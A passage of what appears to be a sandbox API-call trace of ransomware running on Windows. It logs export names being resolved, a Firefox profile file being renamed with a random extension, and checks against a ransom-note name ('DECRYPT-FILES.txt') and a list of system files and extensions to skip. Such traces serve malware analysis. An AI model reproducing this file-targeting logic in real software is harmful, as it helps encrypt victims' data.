lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0184.488] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0184.488] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0184.488] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0184.488] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0184.488] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0184.488] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0184.488] lstrlenA (lpString="CREATEFILEW") returned 11 [0184.488] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0184.488] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0184.488] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0184.488] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0184.488] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0184.488] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0184.488] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0184.488] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0184.488] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0184.488] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0184.489] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0184.489] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0184.489] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0184.489] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0184.489] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0184.489] lstrlenA (lpString="CREATEJOBSET") returned 12 [0184.489] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0184.489] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0184.489] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0184.489] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0184.489] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0184.489] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0184.489] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0184.489] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0184.489] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0184.489] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0184.489] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0184.489] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0184.489] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0184.489] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0184.489] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0184.489] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0184.489] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0184.489] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0184.489] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0184.489] lstrlenA (lpString="CREATEPIPE") returned 10 [0184.489] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0184.489] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0184.489] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0184.489] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0184.489] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0184.489] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0184.489] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0184.489] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0184.489] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0184.489] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0184.489] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0184.490] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0184.490] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0184.490] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0184.490] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0184.490] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0184.490] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0184.490] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0184.490] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0184.490] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0184.490] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0184.490] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0184.490] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0184.490] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0184.490] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0184.490] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0184.490] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0184.490] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0184.490] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0184.490] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0184.490] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0184.490] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0184.490] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0184.490] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0184.490] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0184.490] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0184.490] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0184.490] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0184.490] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0184.490] lstrlenA (lpString="CREATETHREAD") returned 12 [0184.490] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0184.490] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0184.490] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0184.490] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0184.490] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0184.490] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0184.490] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0184.490] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0184.491] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0184.491] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0184.491] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0184.491] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0184.491] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0184.491] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0184.491] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0184.491] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0184.491] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0184.491] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0184.491] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0184.491] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0184.491] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0184.491] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0184.491] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0184.491] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0184.491] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0184.491] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0184.491] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0184.491] lstrlenA (lpString="CTRLROUTINE") returned 11 [0184.491] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0184.491] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0184.491] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0184.491] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0184.491] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0184.491] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0184.491] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0184.491] lstrlenA (lpString="DEBUGBREAK") returned 10 [0184.491] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0184.491] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0184.491] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0184.491] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0184.491] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0184.491] lstrlenA (lpString="DECODEPOINTER") returned 13 [0184.491] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0184.491] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0184.491] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0184.492] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0184.492] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0184.492] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0184.492] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0184.492] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0184.492] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0184.492] lstrlenA (lpString="DELETEATOM") returned 10 [0184.492] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0184.492] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0184.492] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0184.492] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0184.492] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0184.492] lstrlenA (lpString="DELETEFIBER") returned 11 [0184.492] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0184.492] lstrlenA (lpString="DELETEFILEA") returned 11 [0184.492] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0184.492] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0184.492] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0184.492] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0184.492] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0184.492] lstrlenA (lpString="DELETEFILEW") returned 11 [0184.492] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0184.492] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0184.492] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0184.492] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0184.492] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0184.492] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0184.492] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0184.492] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0184.492] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0184.492] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0184.492] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0184.492] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0184.492] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0184.492] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0184.492] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0184.493] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0184.493] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0184.493] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0184.493] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0184.493] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0184.493] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0184.493] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0184.493] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0184.493] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0184.493] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0184.493] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0184.493] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0184.493] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0184.493] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0184.493] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0184.493] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0184.493] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0184.493] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0184.493] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0184.493] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0184.493] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0184.493] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0184.493] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0184.493] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0184.493] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0184.493] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0184.493] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0184.493] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0184.493] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0184.493] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0184.493] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0184.493] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0184.493] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0184.493] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0184.493] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0184.493] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0184.493] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0184.494] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0184.494] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0184.494] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0184.494] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0184.494] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0184.494] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0184.494] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0184.494] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0184.494] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0184.494] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0184.494] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0184.494] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0184.494] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0184.494] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0184.494] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0184.494] lstrcpyW (in: lpString1=0x8b0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0184.494] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\marionette.log.0Eej") returned 107 [0184.494] wsprintfW (in: param_1=0x36fd86c, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\marionette.log.0Eej.zRw4g") returned 113 [0184.494] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\marionette.log.0Eej" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\marionette.log.0eej"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\marionette.log.0Eej.zRw4g" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\marionette.log.0eej.zrw4g"), dwFlags=0x0) returned 1 [0184.497] VirtualFree (lpAddress=0x8a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.498] VirtualFree (lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.498] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.498] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb50b6e70, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb5175550, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xacca9c20, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xffb, dwReserved0=0x0, dwReserved1=0x0, cFileName="mimeTypes.rdf.CrlkH8j", cAlternateFileName="MIMETY~1.CRL")) returned 1 [0184.498] lstrcmpiW (lpString1="mimeTypes.rdf.CrlkH8j", lpString2="DECRYPT-FILES.txt") returned 1 [0184.498] lstrcmpiW (lpString1="mimeTypes.rdf.CrlkH8j", lpString2="autorun.inf") returned 1 [0184.498] lstrcmpiW (lpString1="mimeTypes.rdf.CrlkH8j", lpString2="boot.ini") returned 1 [0184.498] lstrcmpiW (lpString1="mimeTypes.rdf.CrlkH8j", lpString2="desktop.ini") returned 1 [0184.498] lstrcmpiW (lpString1="mimeTypes.rdf.CrlkH8j", lpString2="ntuser.dat") returned -1 [0184.498] lstrcmpiW (lpString1="mimeTypes.rdf.CrlkH8j", lpString2="iconcache.db") returned 1 [0184.498] lstrcmpiW (lpString1="mimeTypes.rdf.CrlkH8j", lpString2="bootsect.bak") returned 1 [0184.498] lstrcmpiW (lpString1="mimeTypes.rdf.CrlkH8j", lpString2="ntuser.dat.log") returned -1 [0184.498] lstrcmpiW (lpString1="mimeTypes.rdf.CrlkH8j", lpString2="thumbs.db") returned -1 [0184.498] lstrcmpiW (lpString1="mimeTypes.rdf.CrlkH8j", lpString2="Bootfont.bin") returned 1 [0184.498] lstrlenW (lpString="mimeTypes.rdf.CrlkH8j") returned 21 [0184.498] lstrcmpiW (lpString1="CrlkH8j", lpString2="lnk") returned -1 [0184.498] lstrcmpiW (lpString1="CrlkH8j", lpString2="exe") returned -1 [0184.498] lstrcmpiW (lpString1="CrlkH8j", lpString2="sys") returned -1 [0184.498] lstrcmpiW (lpString1="CrlkH8j", lpString2="dll") returned -1 [0184.498] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0184.498] lstrlenW (lpString="mimeTypes.rdf.CrlkH8j") returned 21 [0184.498] lstrcpyW (in: lpString1=0x36fe06c, lpString2="C:\\Users\\5p5NrGJn0jS 